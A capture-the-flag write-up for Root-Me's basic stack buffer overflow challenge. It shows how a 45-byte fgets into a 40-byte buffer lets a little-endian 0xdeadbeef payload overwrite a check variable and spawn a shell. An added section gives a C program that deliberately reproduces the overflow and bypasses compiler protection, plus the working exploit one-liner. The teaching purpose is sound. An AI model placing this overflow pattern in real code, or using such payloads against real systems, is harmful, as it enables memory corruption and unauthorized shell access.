ELF x86 — Stack buffer overflow basic 1 Writeup— Rootme

Hariharan@Blog:~$
4 min read · Apr 26, 2021

--

This is the first challenge in Root-Me's App - System category, which is PWN, i.e. binary exploitation. It is a fairly easy stack buffer overflow.

ENVIRONMENT CONDITION

SOURCE CODE

Let us analyze the function. We can see buf[40], so the buffer holds at most 40 bytes. fgets() fills buf from stdin, but its second parameter, the size limit, is 45 rather than 40. fgets() reads up to n-1 = 44 characters and then appends a terminating NUL, so it can write 45 bytes into a 40-byte buffer: 4 attacker-controlled bytes past the end of buf, plus the NUL. Hmm?

That’s right! This is our place of attack.

Let's look further at the code. There are two "if conditions". The first is (check != 0x04030201) && (check != 0xdeadbeef). Judging by that comparison, 0x04030201 is the starting value of check, so this branch fires once check has been changed to anything other than 0xdeadbeef and prints "You are on the right way." It is not a win, just confirmation that our write reached the variable :)

The second "if condition" is check == 0xdeadbeef (a comparison, not an assignment). So we need the check variable to hold exactly that 32-bit value. GOTCHA! But how are we going to get it there?

We use the buffer-overflow technique: fill all 40 bytes of buf, and the next 4 bytes we send land in check, where we place 0xdeadbeef. The terminal snippet below makes it obvious.

I spammed a bunch of A's. buf gets filled and the check variable is overwritten with A's too: 0x41414141 is four 'A' bytes (0x41 each). So the plan is: 40 filler bytes to fill buf, then 4 bytes of our choosing to set check. I use python for this, because typing 40 characters by hand is tedious.

First a sanity check that we are on the right track. Anddddd….

YES, we are on the right track! We sent 40 A's followed by 4 B's: the A's fill buf and the B's land in the check variable (it should now read 0x42424242, four 'B' bytes).

Now what next ? Spoilers ?

We have to overwrite the check variable with the value 0xdeadbeef, and we have to write it in little-endian byte order, because that is how x86 stores a 32-bit integer in memory: least-significant byte first.

0xdeadbeef in little-endian is the byte sequence "\xef\xbe\xad\xde": take the hex digits two at a time (one byte each) starting from the end, and write the bytes in reverse order.

Time to get to the climax!

So we send 40 filler bytes + "\xef\xbe\xad\xde".

After sending this WE SHOULD HAVE GOT OUR FL…..

Wait? We don’t get it?

The shell closes immediately. The spawned shell reads its commands from the same stdin our payload came through, and once python's output is exhausted that stdin is at EOF, so the shell exits. Is there a way to keep it open so we can grab the flag? Yes: append "cat" to the pipeline. cat keeps stdin open and forwards whatever we type to the shell.

Now the shell stays open. Run "whoami" to confirm we actually have a shell and which user it runs as. But where is the flag? That was stated when we ssh'd into the machine. You didn't read that, yeah? It's okay :)
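To make the mechanics concrete, here is an added example (my own code, not the challenge's source): a small C model of the buf[40] + fgets(buf, 45, stdin) pattern, the little-endian packing of 0xdeadbeef, and the payload builder, run end to end. The struct layout, the 0x04030201 starting value (taken from the first if condition) and the fmemopen stand-in for stdin are assumptions made so the demo runs deterministically; in the real binary the stack layout is whatever the compiler chose, and the writeup's 0x41414141 output is the evidence that check sits right above buf there.

```c
/* Added example: a deterministic model of the overflow described in this
 * writeup. It is NOT the challenge's source; the layout below is forced
 * with a struct so the demo behaves the same on every compiler. */
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE    40          /* char buf[40] in the challenge */
#define FGETS_LIMIT 45          /* second argument to fgets() */
#define CHECK_INIT  0x04030201u /* assumed starting value, inferred from check != 0x04030201 */
#define TARGET      0xdeadbeefu /* value the second if condition wants */

/* Memory image of the frame: buf immediately followed by check, plus a
 * little slack for the NUL that fgets writes after the last byte read
 * (in the real binary that NUL lands on whatever sits above check). */
struct frame {
    char     buf[BUF_SIZE];
    uint32_t check;
    char     slack[4];
};

/* Encode a 32-bit value the way x86 stores it: least-significant byte
 * first. 0xdeadbeef becomes ef be ad de. */
void pack_le32(uint32_t value, unsigned char out[4]) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Build `pad` filler bytes + little-endian value. Returns the payload length. */
size_t build_payload(unsigned char *out, size_t pad, uint32_t value) {
    memset(out, 'A', pad);
    pack_le32(value, out + pad);
    return pad + 4;
}

/* Feed `payload` to the vulnerable read (fmemopen stands in for stdin)
 * and return what `check` holds afterwards. */
uint32_t run_vulnerable(const unsigned char *payload, size_t len) {
    unsigned char input[64];
    if (len > sizeof input)
        return 0;
    memcpy(input, payload, len);

    volatile struct frame f;             /* volatile: always re-read check after fgets */
    f.check = CHECK_INIT;
    FILE *in = fmemopen(input, len, "r");
    if (in == NULL)
        return 0;

    char *dst = (char *)f.buf;
    /* Hide the buffer's size from the compiler. A _FORTIFY_SOURCE build
     * would otherwise see 45 > 40 and abort in __fgets_chk instead of
     * overflowing, which is exactly the mitigation this pattern lacks. */
    __asm__ __volatile__("" : "+r"(dst));
    fgets(dst, FGETS_LIMIT, in);        /* may write 44 bytes + NUL: 5 past buf */
    fclose(in);
    return f.check;
}

/* Convenience: check's value after sending `pad` filler bytes + value. */
uint32_t check_after(size_t pad, uint32_t value) {
    unsigned char payload[64];
    size_t n = build_payload(payload, pad, value);
    return run_vulnerable(payload, n);
}

int main(void) {
    unsigned char payload[64];
    size_t n = build_payload(payload, BUF_SIZE, TARGET);

    printf("payload (%zu bytes): ", n);
    for (size_t i = 0; i < n; i++)
        printf("%02x", payload[i]);
    printf("\n");

    printf("check after 10 x 'A'            : 0x%08x\n",
           run_vulnerable((const unsigned char *)"AAAAAAAAAA", 10));
    printf("check after 40 x 'A' only       : 0x%08x\n", check_after(36, 0x41414141u));
    printf("check after 40 x 'A' + 'BBBB'   : 0x%08x\n", check_after(BUF_SIZE, 0x42424242u));
    printf("check after 40 x 'A' + deadbeef : 0x%08x\n", check_after(BUF_SIZE, TARGET));
    return 0;
}
```

Build it with `gcc -Wall demo.c -o demo && ./demo`. Two details worth noticing: even exactly 40 A's already alter check, because fgets's terminating NUL is the 41st byte and clears check's low byte (0x04030201 becomes 0x04030200), which is enough to trigger the "right way" message; and the payload contains no 0x0a, so fgets does not stop early. Against the real binary the equivalent pipeline is `(python -c 'print "A"*40 + "\xef\xbe\xad\xde"'; cat) | ./binary`, with `./binary` standing in for the challenge executable (the writeup does not name it). That one-liner is Python 2, whose print emits the string as raw bytes; under Python 3 use `sys.stdout.buffer.write(b"A"*40 + b"\xef\xbe\xad\xde")` so the 0xef..0xde bytes are not UTF-8 encoded on the way out.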

So now we cat the flag. I am going to leave this part to you; try to get the flag yourself. Gotta be fair, right? :)))))

I hope you understood the challenge! We shall meet in the next challenge.

Until then, BYE.
